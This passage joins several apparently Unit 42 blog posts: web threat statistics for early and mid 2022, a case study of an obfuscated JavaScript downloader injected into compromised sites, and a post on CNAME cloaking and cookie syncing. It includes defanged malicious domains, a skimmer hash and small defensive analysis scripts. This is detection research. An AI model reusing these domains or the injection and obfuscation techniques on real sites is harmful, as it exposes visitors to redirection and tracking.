We analyzed the landing URLs initially identified by our detection model as benign, to find the common targets for these cyberattackers and where they may be trying to fool users. These landing URLs lead to people clicking on malicious host URLs. Going forward, all these landing URLs that lead to malicious code snippets will be marked as malicious by our product.

As shown in Figure 4, the top apparently benign targets are personal sites and blogs, followed by business and economy sites, and computer and internet information sites. Compared to last quarter, computer and internet information sites take third place over shopping sites. Because attackers often try to trick users into following malicious links from seemingly benign sites, we strongly recommend users exercise caution when visiting unfamiliar websites.

Pie chart showing the top 10 categories hosting web threats from April to June 2022. Personal sites and blogs - 14.3%, business and economy sites - 13.8%, computer and internet - 7.8%, shopping - 5.5%, health and medicine - 4.7%, society - 4.6%, entertainment and arts - 4.4%, search engines - 3.7%, parked - 3.4%, travel - 3.2%, Others - 34.7%
Figure 4. We divided landing URLs that originally appeared benign into categories. Here are the top 10 categories that hosted web threats April-June 2022.

Web Threats Malicious Host URLs: Detection Analysis

With Advanced URL Filtering, we detected 1,744,629 incidents of malicious host URLs from April to June 2022, of which 256,844 are unique URLs. The following section will take a closer look at those malicious host URLs. (“Malicious host URLs” specifically refers to pages containing malicious snippets that could abuse users' computing power, steal sensitive information, and so on).

Although the total number of hits is similar to last quarter’s total, the number of unique hits is much greater. This number rose by 42%, suggesting attackers are trying more variants with malicious behavior.
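As a quick check of the 42% figure, the sketch below assumes that "last quarter" refers to the 180,370 unique malicious host URLs reported for January-March 2022. The variable names are illustrative only.

```python
# Unique malicious host URLs per quarter, as reported in the quarterly analyses.
q1_unique = 180_370  # January-March 2022 (assumed to be "last quarter")
q2_unique = 256_844  # April-June 2022

# Relative change between the two quarters.
increase = (q2_unique - q1_unique) / q1_unique
print(f"Unique host URLs rose by {increase:.1%}")
```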

Web Threats Malicious Host URLs Detection: Time Analysis

Figure 5 shows the total number of web threat hits, including those categorized as unique hits.

Bar chart showing April-June 2022 on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. April 2022 = 805,692 total hits: 76,866 unique hits. May 2022 = 385,834 total hits: 64,553 unique hits. June 2022 = 553,103 total hits: 115,425 unique hits.
Figure 5. Web threats malicious host URLs distribution from April-June 2022.

Web Threats Malicious Host URLs Detection: Geolocation Analysis

In our geolocation analysis of host URLs, we discovered that the 256,844 unique malicious host URLs belong to 23,663 unique domains. This is fewer unique domains than we observed for landing URLs.

After identifying the apparent geographical locations for these domain names, we found that the majority of them seem to originate from the United States – as we observe for web threats generally. Figure 6 shows a heat map illustrating these findings.

Choropleth map showing the geolocation distribution of malicious host URLs from April to June 2022
Figure 6. Web threats malicious host URLs’ domain geolocation distribution April-June 2022.

Figure 7 shows the top eight countries where the owners of these domain names appear to be located. The top three countries for malicious host URL domains were the United States, Germany and Russia, the same three we observed for web threats overall. This matches our findings from last quarter.

Pie chart showing distribution of originating country of malicious host URLs from April to June 2022. United States - 66.0%, Germany - 4.8%, Russia - 2.4%, France - 1.7%, United Kingdom - 1.6%, Canada - 1.6%, Netherlands - 1.6%, India - 1.4%, Others - 18.9%
Figure 7. Top eight countries where web threats malicious host URLs’ domains appeared to be located April-June 2022.

Web Threats Malware Class Analysis

The top five web threats we observed are cryptominers, JavaScript downloaders, web skimmers, web scams and JavaScript redirectors. For definitions of these classes, please refer to our blog, “The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More”.

As shown in Figure 8, JavaScript downloader threats showed the most activity, followed by web skimmers and web miners (aka cryptominers). This finding is similar to last quarter.

Bar chart showing js_downloader, web_miner, web_skimmer, web_scam and js_redirector on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. Js_downloader = 930,359 total hits: 112,422 unique hits. Web_miner = 327,472 total hits: 25,590 unique hits. Web_skimmer = 337,710 total hits: 71,468 unique hits. Web_scam = 18,132 total hits: 3,749 unique hits. Js_redirector = 92,157 total hits: 2,988 unique hits.
Figure 8. Top five web threats category distribution April-June 2022.

Web Threats Malware Family Analysis

Based on our classification of web threats explained in the previous section, we further organized our set of web threats by malware family. The family is important to understanding how threats work, because threats in the same family share similar JavaScript code even if the HTML landing pages where they appear have different layouts and styles.

As we did in our yearly analysis, “The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More”, we identified pieces of malware as part of a family by checking for certain characteristics: similar code patterns or behaviors, or having originated from the same attacker.

Figure 9 shows the number of snippets observed for the top 10 malware families we identified. As we’ve seen previously, there were fewer families of JS redirectors, web scams and JS downloaders, while web skimmers show more diversity in code and behavior.

Bar chart showing the web threat families along the X-axis, and 0-200,000 on the Y-axis. Key indicates that blue bars are total hits, and red bars are unique hits.
Figure 9. Web threat malware family distribution from April-June 2022.

Web Threats Case Study: Malicious JavaScript Downloader

Among all of the web threats we detected during this analysis, the most notable was a malicious JavaScript downloader commonly injected into webpages from a popular content management system. This downloader is injected into a legitimate webpage and redirects the user to ads, spam, etc.

We found many websites infected with variants from the same family, which is evolving to evade detection. When we first found this malware family, it was not obfuscated at all. But from a sample we found in the second quarter of 2022, we see it is lightly obfuscated to hide the redirection URL.

Figure 10 shows the malicious JavaScript code snippet from the source code of the compromised website.

JavaScript code snippet from the source code of the compromised website, lightly obfuscated with CharCode.
Figure 10. Source code of a malicious injected JavaScript code snippet.

As we can see, the snippet is lightly obfuscated with CharCode. After we deobfuscate the sample, we get the code shown in Figure 11.

The malicious JavaScript code creates several new script elements that redirect website visitors to another malicious destination. This example code sits under the head of the page and is triggered whenever the page is clicked. We identified several malicious domains, including train[.]developfirstline[.]com, js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com.

Deobfuscated source code showing several malicious domains
Figure 11. Deobfuscated source code of a malicious injected JavaScript code snippet.
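To illustrate how light CharCode obfuscation can be reversed, here is a minimal sketch. It assumes the snippet hides its URL in `String.fromCharCode(...)` calls with decimal arguments, which may not match every variant in this family. The helper name `decode_char_codes` and the sample input (which uses a placeholder domain) are hypothetical and are not taken from the observed samples.

```python
import re

# Matches String.fromCharCode(104, 116, ...) calls with decimal arguments only.
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")


def decode_char_codes(js_source: str) -> str:
    """Replace each String.fromCharCode(...) call with the quoted string it builds."""

    def _decode(match: re.Match) -> str:
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'

    return FROM_CHAR_CODE.sub(_decode, js_source)


# Hypothetical obfuscated line; the encoded value is a placeholder URL.
sample = (
    "s.src = String.fromCharCode("
    "104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,99,111,109);"
)
print(decode_char_codes(sample))
```

A static decoder like this avoids executing the untrusted script, but it only handles the simplest encoding. Heavier obfuscation generally needs a sandboxed JavaScript engine.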

In a more recent sample from this malicious downloader family, the whole JavaScript code is highly obfuscated, as shown in Figure 12. After we deobfuscated the code passed to the JavaScript eval function, the malicious code resembled that shown in Figure 11 above.

Highly obfuscated code from a malicious downloader sample
Figure 12. Source code of a highly obfuscated malicious downloader sample.

From our detection data, we found around 5,000 hits for this type of JavaScript injection from our customers. This threat infected around 300 different domains from April 2022 to June 2022, which shows how active this malicious JavaScript downloader family is.

Conclusion

As we highlighted in this blog, the most prevalent web threats are still JS downloaders, cryptominers, web skimmers, web scams and JS redirectors. Of the landing URLs we analyzed, the top three verticals targeted by attackers were personal sites and blogs, business and economy sites, and computer and internet information sites.

We found one threat particularly notable, where a JavaScript downloader evolved over time to more effectively evade detection. Earlier in its history, variants from this family were less obfuscated, but more recent versions are more highly obfuscated.

While cybercriminals continue to seek opportunities for malicious cyber activities, Palo Alto Networks customers receive protection from the web threat attacks discussed here as well as many others, via the Advanced URL Filtering, DNS Security and Threat Prevention cloud-delivered security services.

We also recommend the following actions:

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Malicious Web Skimmer SHA256:
bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e122

train[.]developfirstline[.]com
js[.]digestcolect[.]com
stat[.]trackstatisticsss[.]com

Acknowledgements

We would like to thank Mike Harbison, Billy Melicher, Alex Starov, Jun Javier Wang and Laura Novak for their help with the blog.

CNAME Cloaking: Disguising Third Parties Through the DNS

Executive Summary

When you visit a website, do you ever feel like you’re being watched? Who is observing your movements through that website - or across the internet in general? Is it possible to limit or at least understand that information flow?

With advertising at the heart of much of the internet, user data is an invaluable resource to those companies that profit from monitoring people’s online activities. In many cases, the information they collect provides helpful (if not truly necessary) support for a good user experience. In other cases, tracking practices infringe on people’s privacy, and they have raised valid concerns.

In response to these concerns, many groups have developed tools or adapted applications to protect user privacy. One step taken by major browsers is to block third-party cookies. This action has led analytics, advertising and marketing organizations to develop new strategies for collecting user information. One of these is CNAME cloaking.

CNAME cloaking leverages the Domain Name System (DNS) to hide when a browser is sending information to a domain controlled by a third party (such as an advertiser) rather than staying on the domain controlled by a website owner. CNAME cloaking undermines mechanisms that some people depend on to guard their privacy, and could lead to or be used with other practices that decrease people’s privacy.

Palo Alto Networks has developed a system to detect domains used in CNAME cloaking. The insights generated by this detector are available to Palo Alto Networks Next-Generation Firewall customers with cloud-delivered security services, including DNS Security and Advanced URL Filtering.

Related Unit 42 Topics DNS

How Tracking Leads to Cookies

Much of the content and many services available on the web are funded by revenue from advertising. Advertising has historically relied on tracking. This relationship stems from advertisers’ desire to maximize the efficiency of their marketing efforts.

One way advertisers try to maximize efficiency is to show people only advertisements for products or services they are likely to purchase. How do advertisers know which advertisements are actually relevant? While there is no cookie-cutter approach, tracking is currently a popular option.

In the context of the internet, tracking involves monitoring people’s activities within a website or across multiple websites. Tracking can serve many useful purposes.

For example, a website owner can use tracking data to personalize a customer’s experience, maintain their cart, or measure the effectiveness of an advertising campaign. Customers can benefit from these enhancements, and (where tracking is kept to a reasonable scope) issues regarding privacy can be limited. However, in practical application, the scope in which information is shared is often larger than a specific website or company.

Both website owners and advertisers use the services of companies specializing in analytics and marketing, which can include passing along user data. This data sometimes includes personal information. Even if it does not, the ability for various parties to collect information about users without their knowledge and consent – potentially across multiple sites and devices – has caused people much concern.

In response to these concerns, developers of major browsers began introducing features to protect people against certain types of tracking. One of the major changes developers made was to change how browser cookies are handled, by blocking third-party cookies or placing limitations on how they are accessed.

How Does Cookie Blocking Work?

A cookie is essentially a token that a website gives a user, which their browser is expected to send in communications with that website.

The cookie provides convenient support for tracking, in that it ties the request to the user, and it also tells the website owner what the user is doing.

A first-party cookie is generated by the owner of the domain hosting the website a person is browsing. Third-party cookies belong to a domain a user is not currently visiting, and they are usually used for advertising.

To give an example: suppose a user, Alice, browses www[.]example[.]com. Bob owns the domain example[.]com and has configured his servers to send users cookies when they visit the website hosted at that domain. When Alice browses to other pages in example[.]com (e.g. chocolate_chip.example[.]com or www[.]example[.]com/gingersnap), the messages that she sends will include that cookie. Figure 1 illustrates these interactions.

The user pictured browses to www[.]example[.]com. An HTTP Get request is sent to the site's webservers, and the owner has configured them to send users cookies in response. In this example, the cookie "my_cookies" is set to the value "peanut_butter." When the user in this example browses to other pages on this domain, the messages that she sends will include the cookie "peanut_butter," allowing her movements on the site to be tracked.
Figure 1. The cookie my_cookie is set via the headers in the response from www[.]example[.]com.

Depending on the cookie’s attributes and Alice’s browser configuration, Alice’s requests to example[.]com will only include the cookie if Alice is already browsing example[.]com. For example, Alice’s browser will include the cookie in a request for example[.]com/oatmeal.png if Alice is browsing www[.]example[.]com, but not if she is visiting www[.]example[.]net. This limitation helps to protect Alice’s privacy by preventing Bob from seeing what other sites Alice visits.

As another step to help protect Alice’s privacy, her browser can block cookies set by any domain other than example[.]net while Alice is browsing example[.]net. To illustrate this, suppose an advertisement from ads[.]example[.]com appears on www[.]example[.]net. The owner of ads[.]example[.]com sends Alice’s browser a cookie when serving the advertisement, and this would be a third-party cookie (as shown in Figure 2). If Alice’s browser is set to block third-party cookies, the cookie will not be returned to example[.]com in future requests.

Figure 2. The cookie from example[.]com is a third-party cookie, and it is blocked.
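The first-party versus third-party decision described above can be sketched as follows. This is a simplified illustration, not how any particular browser implements it. The function names are hypothetical, and the "last two labels" rule is an assumption that stands in for the Public Suffix List that real browsers consult.

```python
def registrable_domain(host: str) -> str:
    """Naive approximation: keep the last two labels of the hostname.

    Real browsers consult the Public Suffix List; this shortcut is an
    assumption that only holds for simple names such as example.com.
    """
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def is_third_party(page_host: str, cookie_host: str) -> bool:
    """True when the cookie's host belongs to a different site than the page."""
    return registrable_domain(page_host) != registrable_domain(cookie_host)


def cookie_allowed(page_host: str, cookie_host: str, block_third_party: bool = True) -> bool:
    """Decide whether a browser that blocks third-party cookies would accept the cookie."""
    return not (block_third_party and is_third_party(page_host, cookie_host))


# Alice browses www.example.com and requests a resource from example.com.
print(cookie_allowed("www.example.com", "example.com"))
# Alice browses www.example.net and an ad is served from ads.example.com.
print(cookie_allowed("www.example.net", "ads.example.com"))
```

The first call treats the cookie as first-party and allows it. The second treats it as third-party and blocks it.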

What Is CNAME Cloaking?

The prospect of the elimination of third-party cookies has caused some concern among advertisers and companies providing web-traffic analytics. These organizations often have their content embedded in other websites, and they rely on cookies being sent from those websites to collect information about their audience so they can tailor their campaigns accordingly.

With the elimination of third-party cookies, these entities will have less information with which to target their ads or perform their analysis. To address this limitation, some have turned to a practice known as canonical name (aka CNAME) cloaking.

A CNAME record is a type of DNS resource record (RR) that maps an alternate domain name to its true name. CNAME records are also useful for directing users to a single domain from multiple domain names.

If a DNS resolver sends a request for the IP address of a domain and receives a CNAME record, the resolver will then typically query for the IP address of the CNAME. Once the resolver has the IP address, it will return that IP address to the client that initiated the query.

When browsers initiate DNS queries for the domain names of websites, they often do not have visibility into these queries, and thus will not know that a domain has a CNAME record. The browser only sees the original name and the IP address to which that name ultimately resolves.

Figure 3 shows the basic outline of how CNAME cloaking works. A website owner, Bob, embeds content provided by a third party into the website at www[.]example[.]com. That content is served from ad[.]example[.]com, which is a subdomain of the domain used to host the website.

Bob also creates a CNAME record for ad[.]example[.]com that points to x[.]example[.]net, a subdomain belonging to the tracker. When Alice browses to www[.]example[.]com and her browser sends a request to ad[.]example[.]com, that request appears to be going to the same domain used to host the website.

Alice’s browser will treat cookies sent in the response from ad[.]example[.]com as first-party cookies. This is how CNAME cloaking allows third parties to receive and set cookies, circumventing protections the browser might have against such activity.

CNAME cloaking does not support the same level of tracking as would be available if third-party cookies were allowed. The practice is nevertheless concerning because it hides information about where people’s data is sent, and it might create other problems such as leaking information to the third party or creating new vulnerabilities.

The user pictured browses to www[.]example[.]com. An ad embedded on the site is located at x[.]example[.]net, but because the website owner created a CNAME record that resolves to the IP address 1.2.3[.]4, this tracking activity is disguised.
Figure 3. CNAME cloaking allows tracking activity to be disguised.
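The gap between what the resolver follows and what the browser sees can be sketched with a toy lookup table. The records and IP addresses below are hypothetical stand-ins for real DNS responses, and the `resolve` helper is illustrative rather than a real resolver API.

```python
# Hypothetical zone data standing in for real DNS responses.
RECORDS = {
    "www.example.com": ("A", "192.0.2.1"),
    "ad.example.com": ("CNAME", "x.example.net"),  # the cloaking record
    "x.example.net": ("A", "192.0.2.4"),
}


def resolve(name: str, max_hops: int = 8):
    """Follow CNAME records until an A record is found, as a resolver would."""
    chain = [name]
    for _ in range(max_hops):
        record_type, value = RECORDS[chain[-1]]
        if record_type == "A":
            return value, chain
        chain.append(value)  # CNAME: continue with the canonical name
    raise RuntimeError("CNAME chain too long")


ip_address, chain = resolve("ad.example.com")
print("Resolver followed:", " -> ".join(chain))
print("Browser sees:", chain[0], "at", ip_address)
```

Only the first name in the chain and the final IP address reach the browser, so the tracker's domain never appears in its first-party checks.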

Defenses

CNAME cloaking is not a new strategy, and a few defenses have already been deployed in this area. Some of these defenses come in the form of browser extensions that rely on blocklists. However, blocklists do not provide a scalable approach to CNAME cloaking detection, as the number of first-party subdomains that can be used to point to third parties is almost limitless.

uBlock Origin is one extension that takes a different approach to detecting CNAME cloaking based on DNS lookups. However, this defense only works in Firefox due to restrictions on access to DNS APIs.

Privacy Badger also takes a slightly different approach and looks for tracking behavior. Unfortunately, this browser plugin only works to block third parties, and because CNAME cloaking disguises third parties, this plugin does not protect against this technique.

In contrast to browser-based defenses, a DNS-based approach allows communication to be blocked based on the domain name of the tracker, rather than that of the subdomain used for tracking. A few other groups, such as AdGuard and NextDNS, have used this strategy for ad blocking.

This DNS-based approach is more scalable than most browser-based approaches, and it is the one Palo Alto Networks has taken. Using the insights provided by our passive DNS data, we can see the subdomains resolving to domains belonging to known trackers. This information forms the basis of our CNAME cloaking detector. These results provide people with insights into which advertising or marketing organizations are accessing their data via CNAME cloaking. Customers can also block the cloaked fully qualified domain names (FQDNs).
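A minimal sketch of the general idea follows: matching CNAME targets from DNS data against a list of known tracker domains. It is not the actual Palo Alto Networks detector. The record format, the tracker list and the function names are all assumptions made for illustration.

```python
def is_subdomain_of(name: str, domain: str) -> bool:
    """True if name equals domain or sits anywhere beneath it."""
    return name == domain or name.endswith("." + domain)


def find_cloaked(cname_records, tracker_domains):
    """Return (fqdn, tracker) pairs where a non-tracker name aliases a tracker domain.

    cname_records: iterable of (fqdn, cname_target) pairs, e.g. from passive DNS.
    tracker_domains: collection of domains known to belong to trackers.
    """
    hits = []
    for fqdn, target in cname_records:
        fqdn = fqdn.lower().rstrip(".")
        target = target.lower().rstrip(".")
        for tracker in sorted(tracker_domains):
            # Skip the tracker's own internal aliases; flag everyone else's.
            if is_subdomain_of(target, tracker) and not is_subdomain_of(fqdn, tracker):
                hits.append((fqdn, tracker))
    return hits


# Hypothetical inputs: example.net plays the role of the tracker.
TRACKER_DOMAINS = {"example.net"}
observed = [
    ("ad.example.com", "x.example.net"),    # cloaked first-party subdomain
    ("www.example.org", "cdn.example.org"), # ordinary same-site alias
    ("x.example.net", "lb.example.net"),    # tracker's own internal alias
]
print(find_cloaked(observed, TRACKER_DOMAINS))
```

Because the match is made on the CNAME target rather than on each first-party subdomain, the tracker list stays small even as the number of cloaked subdomains grows.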

CNAME Cloaking Detections in Action

After running for a month, our CNAME cloaking detector identified almost 43,000 cloaked subdomains in over 38,000 root domains. The cloaked subdomains have CNAME records pointing to domains belonging to 32 organizations, which are largely focused on analysis for advertising or marketing purposes (see Figure 4). The lists created by AdGuard and EasyPrivacy each cover less than 10% of the subdomains we detect.

Of the domains using CNAME cloaking, 98% have a cloaked subdomain pointing to only one third-party domain. Several hundred subdomains rely on two third-party domains, and a handful rely on three or four domains.

Similarly, over 92% of domains using CNAME cloaking have only a single cloaked FQDN, but several thousand have two or more, and a few have over ten. We have even observed some cases where entities will create a wildcard record pointing to the third-party domain.

This chart shows newly detected first party domains using a tracker CNAME. The X-axis has a date range from June 22, 2022 to July 5, 2022. The Y-axis is delineated in increments of 50, between zero and 200. The key identifies nine specific marketing and analytics companies, and one category marked "other".
Figure 4. Newly detected first-party domains per day, by tracker.

As noted above, CNAME cloaking is not an indication of inherently malicious activity. However, it does cause several problems: it undermines practices designed to protect people’s privacy, it decreases visibility into where their data goes, and it can create additional vulnerabilities. Examining a sample of slightly over 4,000 of the cloaked FQDNs identified by our detector provides insights into how cloaking is used.

Cloaking for Third-Party Cookies

As expected, many domains use CNAME cloaking to support sending cookies that were generated in the first-party context to a third-party service.

For example, 85% of the websites using CNAME cloaking with Adobe Experience Cloud sent requests to the cloaked FQDN that contained an AMCV cookie. As Adobe’s documentation explains, an AMCV cookie allows a website owner to track users across the website or across multiple domains belonging to that owner.

Slightly over a third of the websites using Adobe sent an s_ecid cookie, which supports “persistent ID tracking in the 1st-party state,” and it is “used as a reference ID if the AMCV cookie has expired.” This cookie is only usable for domains leveraging CNAME cloaking.

Other Adobe Experience Cloud cookies sent by many of the domains using the service include the AMCVS cookie (a session cookie used to determine if the session has been initialized), the s_cc cookie (used to determine if cookies are enabled), and the s_ppv cookie (used to measure scroll activity).

Requests to cloaked domains with CNAMEs pointing to Mapp’s wt-eu02[.]net include a variety of cookies supporting several functions, such as load balancing, determining whether a visitor is a newcomer or returning guest on a website, and tracking. In our sample, 76% of sites relying on Mapp used at least one of these cookies.

About 14% of domains using Salesforce sent visitor_id and visitor_id<accountid>-hash cookies to their cloaked subdomains.

Evading Defenses With Cookie Syncing

The Salesforce cookies provide an interesting example of one way trackers are handling protections introduced by browsers. Salesforce has developed an approach to deal specifically with Safari’s limitations on third-party cookies with Intelligent Tracking Prevention (ITP) 1.2.

Following this approach, Salesforce customers embed code in their websites to retrieve a script from pi.pardot[.]com that sets the visitor_id and visitor_id<accountid>-hash cookies, and then it retrieves a script from the customer’s cloaked domain (as shown in Figure 5).

Script retrieved from pi.pardot[.]com.
Figure 5. Script retrieved from pi.pardot[.]com.

The script retrieved from the cloaked domain does nothing (as shown in Figure 6), but the HTTP response headers set the same two cookies (shown in Figure 7).

The script retrieved from the cloaked domain does nothing.
Figure 6. Script retrieved from cloaked domain.

The HTTP response headers set the visitor_id and visitor_id<accountid>-hash cookies.
Figure 7. Headers in the response returning a script from a cloaked domain.

This process results in identical cookies but with different domains (shown in Figure 8), which is an example of cookie syncing.

The visitor_id and visitor_id<accountid>-hash cookies for the tracker and cloaked domains are the same.
Figure 8. The same cookie is set on the tracker domain and the cloaked domain.
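One way to spot this pattern in captured traffic is to look for identical name and value pairs set on more than one domain. The sketch below assumes cookie observations are available as simple tuples. The cookie names, values and the cloaked domain go.example.com are hypothetical.

```python
from collections import defaultdict


def find_synced_cookies(observations):
    """Group cookies by (name, value) and keep those seen on several domains.

    observations: iterable of (cookie_domain, cookie_name, cookie_value).
    """
    domains_by_cookie = defaultdict(set)
    for domain, name, value in observations:
        domains_by_cookie[(name, value)].add(domain)
    return {
        cookie: sorted(domains)
        for cookie, domains in domains_by_cookie.items()
        if len(domains) > 1
    }


# Hypothetical capture: the same visitor cookie appears on the tracker
# domain and on the customer's cloaked subdomain.
observed = [
    ("pi.pardot.com", "visitor_id12345", "987654321"),
    ("go.example.com", "visitor_id12345", "987654321"),
    ("go.example.com", "session", "abc123"),
]
print(find_synced_cookies(observed))
```

Matching on exact values keeps the check simple, although trackers that transform the identifier before syncing would not be caught by it.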

Cookie Leaks

One consequence of using CNAME cloaking is that other first-party cookies might automatically be sent to the cloaked FQDN. Unexpectedly, the most common cookies seen in requests to cloaked domains were not those set by the tracker involved in the cloaking, but those associated with Google Analytics (see Table 1).

Cookie                  Websites sending cookie to cloaked domain    Tracker domains receiving cookie
_ga                     322                                          18
_gid                    299                                          17
_gcl_au                 191                                          14
GoogleAnalytics_gat     149                                          10
GoogleAnalytics_ga      95                                           15
Adobe_AMCV              92                                           2
Adobe_AMCVS             91                                           2
s_cc                    85                                           3
GoogleAnalytics_gtm     80                                           9
Act-On Beacon Cookie    75                                           2

Table 1. These cookies are those seen most commonly in requests. Rows in blue indicate Google Analytics Cookies.

Other cookies commonly seen in the requests sent to cloaked FQDNs include those belonging to Hotjar, Microsoft and Dynatrace. None of these services are on our list of parties supporting CNAME cloaking.

Conclusion

Many websites use CNAME cloaking to circumvent browser restrictions on third-party cookies. It is useful for those who want to leverage the services of third-party analytics, advertising or marketing organizations efficiently.

While cookies and the services provided by organizations that deal in tracked information can serve constructive purposes, CNAME cloaking raises serious security and privacy concerns. First and foremost, the practice decreases visibility into who is receiving users’ data, and it limits people’s ability to control what’s done with their information. Secondly, CNAME cloaking can lead to extra user information being sent to third parties due to cookie leaks. Finally, the use of CNAME cloaking could indicate a willingness to undermine other privacy protections, as we also see it in conjunction with other questionable practices such as cookie syncing.

Palo Alto Networks detects domains using CNAME cloaking and assigns them to the adtracking category through our cloud-delivered security services for Next-Generation Firewalls. These subscriptions include DNS Security and Advanced URL Filtering. Through this detector, we provide our customers visibility into and control over where their data is sent.

Trends in Web Threats: Old Web Skimmer Still Active Today

Executive Summary

The Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs: landing URLs and host URLs. We define a malicious landing URL as one that provides an opportunity for a user to click a malicious link. A malicious host URL is a web page that contains a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

Between January 2022 and March 2022, Palo Alto Networks detected over 577,000 instances of landing URLs, of which 20% were unique URLs. We also detected over two million host URLs, of which about 9% were unique URLs. This analysis was done using our web threat detection modules, which are used in our cloud-delivered security services such as Advanced URL Filtering.

In this blog, we present our analysis and findings around the latest trends of web threats like host and landing URLs, including where they are hosted, what categories they belong to, and which malware families are more likely to pose a threat. We also take a look at other threats such as skimmer attacks, downloaders and cryptominers.

With the help of Palo Alto Networks Advanced URL Filtering and Threat Prevention cloud-delivered security services, customers are protected from the threats discussed in this blog. Our web protection engine, Advanced URL Filtering, helps detect malicious URLs such as landing and host URLs. Our intrusion prevention system, Advanced Threat Prevention, applies added protection and helps prevent web threats like cryptomining and JavaScript downloading.

Types of Attacks and Vulnerabilities Covered Skimmer attacks, malware, cryptominers
Related Unit 42 Topics Information stealing, A Closer Look at the Web Skimmer, The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More

Web Threats Landing URLs: Detection Analysis

Palo Alto Networks crawls and analyzes millions of URLs from different sources every day, including newly seen URLs in customer traffic and email links. We collected web threat related data from customers with our Advanced URL Filtering subscription, using special YARA signatures.

Between January 2022 and March 2022, we detected 577,275 incidents involving landing URLs containing all kinds of web threats, 116,643 of which were unique URLs. Compared to the previous quarter, the total number of incidents involving landing URLs increased while the number of unique URLs decreased.

Web Threats Landing URLs Detection: Time Analysis

As shown in Figure 1 and also mentioned in our blog, “Web Threats: Malicious Host URLs, Landing URLs and Trends”, we saw an increase in landing URLs in November 2021, and this number then declined from January through March 2022.

Bar chart showing web threat trends. January-March 2022 on the X-axis, and 0-250,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. January 2022 = 216,621 total hits: 46,534 unique hits. February 2022 = 212,643 total hits: 31,825 unique hits. March 2022 = 148,011 total hits: 38,284 unique hits.
Figure 1. Web threats landing URLs distribution January-March 2022. (Blue bars indicate all detections, including repeated detections of the same URL, and red bars indicate detection of unique URLs).

Web Threats Landing URLs: Geolocation Analysis

According to our analysis, the previously mentioned 116,643 malicious unique landing URLs came from 22,279 unique domains. After identifying the geographical locations of these domains, we found that the majority of them seem to originate from the United States, followed by Germany and Russia, which was also the case in the previous quarter. However, we recognized that attackers are leveraging proxy servers and VPNs located in those countries to hide their actual physical locations.

The choropleth map in Figure 2 shows the wide distribution of these domains across almost every continent, including Africa and Australia. Figure 3 shows the top eight countries where the owners of these domain names appeared to be located.

Choropleth map showing the geolocation distribution of landing URLs from January-March 2022
Figure 2. Web threats landing URLs’ domain geolocation distribution January-March 2022.

Pie chart showing distribution of originating country of landing URLs from January-March 2022. United States - 62.2%, Germany - 3.9%, Russia - 3.0%, France - 1.6%, United Kingdom, Brazil and Netherlands - 1.3% each, Canada - 1.1%, Others - 24.3%
Figure 3. Top eight countries where web threat landing URLs’ domains originated from, between January 2022 and March 2022.

Web Threats Landing URLs: Category Analysis

We analyzed landing URLs that were originally identified by our detection module as benign, to find common targets for cyberattackers, and where they might be trying to fool users. These landing URLs can potentially lead to people clicking on a malicious host URL. Going forward, all these landing URLs that lead to malicious code snippets will be marked as malicious by our Advanced URL Filtering service.

As shown in Figure 4, the top apparently benign targets are business and economy sites, followed by personal sites and blogs, and then shopping sites. Compared to last quarter, the top two categories flipped. Because attackers often try to trick users into clicking malicious links from seemingly benign sites, we strongly recommend that users exercise caution when visiting an unfamiliar website.

Pie chart showing the top 10 categories hosting web threats from January-March 2022. Business and economy sites - 14.9%, personal sites and blogs - 9.1%, shopping - 7.8%, computer and internet - 7.5%, health and medicine - 5.5%, society - 4.8%, entertainment - 4.3%, web hosting - 3.6%, travel - 3.3%, parked - 2.9%, Others - 36.3%
Figure 4. We divided landing URLs that originally appeared benign into categories. Here are the top 10 categories that hosted web threats January-March 2022.

Web Threats Malicious Host URLs: Detection Analysis

With Advanced URL Filtering, we detected 2,043,862 incidents of malicious host URLs from January 2022 to March 2022, of which 180,370 were unique URLs. In the following section, we will take a closer look at those malicious host URLs. (“Malicious host URLs” specifically refers to pages that contain a malicious snippet that could abuse users' computing power, steal sensitive information and so on).

Web Threats Malicious Host URLs Detection: Time Analysis

As seen in our analysis of landing URLs, and also mentioned in our previous blog, “Web Threats: Malicious Host URLs, Landing URLs and Trends”, we discovered web threats were more active in November 2021 and then declined slowly from January through March 2022.

Bar chart showing January-March 2022 on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. January 2022 = 841,284 total hits: 77,460 unique hits. February 2022 = 688,020 total hits: 50,996 unique hits. March 2022 = 514,558 total hits: 51,914 unique hits.
Figure 5. Web threats malicious host URLs distribution January-March 2022.

Web Threats Malicious Host URLs Detection: Geolocation Analysis

In our geolocation analysis of host URLs, we discovered that the 180,370 unique malicious host URLs belonged to 17,660 unique domains, fewer than the 22,279 unique domains we observed for landing URLs. This suggests attackers target different entry points but often use fewer domains to host the malicious code. At the same time, the number of unique malicious host URLs (180,370) was higher than the number of unique landing URLs (116,643), which suggests that attackers are deploying more malicious code when they can leverage a single entry point.
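
To make the comparison concrete, the short sketch below computes the average number of unique URLs per unique domain from the figures quoted in this post. It is only arithmetic on the published totals; the function name is our own.

```python
# Totals quoted in this post for January-March 2022.
landing_urls, landing_domains = 116_643, 22_279
host_urls, host_domains = 180_370, 17_660


def urls_per_domain(unique_urls: int, unique_domains: int) -> float:
    """Average number of unique URLs observed per unique domain."""
    return unique_urls / unique_domains


landing_ratio = urls_per_domain(landing_urls, landing_domains)
host_ratio = urls_per_domain(host_urls, host_domains)

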